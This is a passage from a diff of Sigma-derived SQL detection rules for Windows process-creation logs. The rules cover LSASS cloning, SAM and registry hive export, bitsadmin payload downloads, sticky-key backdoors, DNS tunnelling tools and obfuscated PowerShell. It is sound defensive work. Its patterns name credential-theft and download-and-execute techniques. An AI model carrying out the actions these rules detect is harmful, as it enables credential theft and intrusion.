\"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iodine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], "falsepositives": [ - "Unknown" + "Winzip", + "Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE 